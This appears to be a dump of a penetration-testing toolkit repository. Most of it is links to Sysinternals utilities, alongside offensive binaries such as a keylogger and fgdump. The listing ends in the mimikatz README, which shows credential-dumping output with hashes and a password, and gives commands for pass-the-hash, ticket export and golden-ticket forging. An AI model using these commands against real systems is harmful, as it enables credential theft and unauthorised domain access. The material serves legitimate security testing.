https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/ADExplorer.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/ADInsight.chm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/ADInsight.chm -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/ADInsight.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/ADInsight.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/AccessEnum.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/AccessEnum.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/AdExplorer.chm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/AdExplorer.chm -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/Autologon.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Autologon.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/Bginfo.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Bginfo.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/Cacheset.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Cacheset.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/Clockres.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Clockres.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/Contig.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Contig.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/Coreinfo.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Coreinfo.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/DISKMON.HLP: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/DISKMON.HLP -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/DMON.SYS: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/DMON.SYS -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/Dbgview.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Dbgview.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/Desktops.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Desktops.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/Disk2vhd.chm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Disk2vhd.chm -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/DiskView.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/DiskView.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/Diskmon.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Diskmon.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/Eula.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Eula.txt -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/FindLinks.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/FindLinks.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/Listdlls.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Listdlls.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/LoadOrd.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/LoadOrd.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/PORTMON.CNT: -------------------------------------------------------------------------------- 1 | :Base portmon.hlp 2 | :Title Portmon 3 | 1 Introduction to Portmon 4 | 2 Introduction=INTRO 5 | 1 Using Portmon 6 | 2 Starting Portmon=START 7 | 2 Capturing Port Activity=CAPTURE 8 | 2 Searching and Filtering=SEARCH 9 | 2 Saving and Printing=SAVE 10 | 2 Options=OPTIONS 11 | 1 Remote Monitoring 12 | 2 Preparing for Remote Monitoring=REMOTE 13 | 2 Managing Remote Views=MANAGE 14 | 2 Managing Multiple Windows=WINDOW 15 | 1 Reporting Problems 16 | 2 Reporting Problems=BUG 17 | -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/PORTMON.HLP: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/PORTMON.HLP -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/Procmon.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Procmon.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/PsExec.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/PsExec.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/PsGetsid.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/PsGetsid.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/PsInfo.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/PsInfo.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/PsLoggedon.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/PsLoggedon.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/PsService.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/PsService.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/Pstools.chm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Pstools.chm -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/RAMMap.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/RAMMap.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/RegDelNull.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/RegDelNull.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/RootkitRevealer.chm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/RootkitRevealer.chm -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/RootkitRevealer.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/RootkitRevealer.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/ShareEnum.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/ShareEnum.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/ShellRunas.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/ShellRunas.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/Sysmon.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Sysmon.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/TCPVIEW.HLP: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/TCPVIEW.HLP -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/Tcpvcon.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Tcpvcon.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/Tcpview.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Tcpview.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/Vmmap.chm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Vmmap.chm -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/Volumeid.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Volumeid.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/WINOBJ.HLP: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/WINOBJ.HLP -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/Winobj.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Winobj.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/ZoomIt.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/ZoomIt.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/accesschk.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/accesschk.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/adrestore.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/adrestore.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/autoruns.chm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/autoruns.chm -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/autoruns.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/autoruns.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/autorunsc.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/autorunsc.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/ctrl2cap.amd.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/ctrl2cap.amd.sys -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/ctrl2cap.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/ctrl2cap.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/ctrl2cap.nt4.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/ctrl2cap.nt4.sys -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/ctrl2cap.nt5.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/ctrl2cap.nt5.sys -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/dbgview.chm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/dbgview.chm -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/disk2vhd.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/disk2vhd.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/diskext.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/diskext.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/du.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/du.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/efsdump.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/efsdump.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/handle.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/handle.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/hex2dec.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/hex2dec.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/junction.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/junction.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/ldmdump.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/ldmdump.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/livekd.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/livekd.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/logonsessions.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/logonsessions.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/movefile.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/movefile.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/ntfsinfo.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/ntfsinfo.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/pagedfrg.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/pagedfrg.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/pagedfrg.hlp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/pagedfrg.hlp -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/pendmoves.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/pendmoves.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/pipelist.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/pipelist.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/portmon.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/portmon.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/procdump.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/procdump.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/procexp.chm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/procexp.chm -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/procexp.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/procexp.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/procmon.chm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/procmon.chm -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/psfile.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/psfile.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/pskill.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/pskill.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/pslist.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/pslist.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/psloglist.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/psloglist.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/pspasswd.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/pspasswd.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/psping.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/psping.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/psshutdown.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/psshutdown.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/pssuspend.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/pssuspend.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/psversion.txt: -------------------------------------------------------------------------------- 1 | PsTools Version in this package: 2.44 2 | -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/readme.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/readme.txt -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/regjump.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/regjump.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/ru.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/ru.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/sdelete.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/sdelete.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/sigcheck.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/sigcheck.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/streams.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/streams.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/strings.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/strings.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/sync.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/sync.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/tcpview.chm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/tcpview.chm -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/vmmap.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/vmmap.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/whois.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/whois.exe -------------------------------------------------------------------------------- /net/Windows/WiresharkPortable-1.12.3.paf.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/WiresharkPortable-1.12.3.paf.exe -------------------------------------------------------------------------------- /net/Windows/exe2bat.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/exe2bat.exe -------------------------------------------------------------------------------- /net/Windows/fgdump.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/fgdump.exe -------------------------------------------------------------------------------- /net/Windows/klogger.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/klogger.exe -------------------------------------------------------------------------------- /net/Windows/mimikatz_trunk/README.md: -------------------------------------------------------------------------------- 1 | # mimikatz 2 | 3 | **`mimikatz`** is a tool I've made to learn `C` and make somes experiments with Windows security. 4 | 5 | It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. **`mimikatz`** can also perform pass-the-hash, pass-the-ticket or build _Golden tickets_. 6 | 7 | ``` 8 | .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03) 9 | .## ^ ##. 10 | ## / \ ## /* * * 11 | ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) 12 | '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) 13 | '#####' with 13 modules * * */ 14 | 15 | 16 | mimikatz # privilege::debug 17 | Privilege '20' OK 18 | 19 | mimikatz # sekurlsa::logonpasswords 20 | 21 | Authentication Id : 0 ; 515764 (00000000:0007deb4) 22 | Session : Interactive from 2 23 | User Name : Gentil Kiwi 24 | Domain : vm-w7-ult-x 25 | SID : S-1-5-21-1982681256-1210654043-1600862990-1000 26 | msv : 27 | [00000003] Primary 28 | * Username : Gentil Kiwi 29 | * Domain : vm-w7-ult-x 30 | * LM : d0e9aee149655a6075e4540af1f22d3b 31 | * NTLM : cc36cf7a8514893efccd332446158b1a 32 | * SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30 33 | tspkg : 34 | * Username : Gentil Kiwi 35 | * Domain : vm-w7-ult-x 36 | * Password : waza1234/ 37 | ... 38 | ``` 39 | But that's not all! `Crypto`, `Terminal Server`, `Events`, ... lots of informations in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, _yes_). 40 | 41 | If you don't want to build it, binaries are availables on https://github.com/gentilkiwi/mimikatz/releases 42 | 43 | 44 | ## Quick usage 45 | ``` 46 | log 47 | privilege::debug 48 | ``` 49 | 50 | ### sekurlsa 51 | ``` 52 | sekurlsa::logonpasswords 53 | sekurlsa::tickets /export 54 | 55 | sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd 56 | ``` 57 | 58 | ### kerberos 59 | ``` 60 | kerberos::list /export 61 | kerberos::ptt c:\chocolate.kirbi 62 | 63 | kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi 64 | ``` 65 | 66 | ### crypto 67 | ``` 68 | crypto::capi 69 | crypto::cng 70 | 71 | crypto::certificates /export 72 | crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE 73 | 74 | crypto::keys /export 75 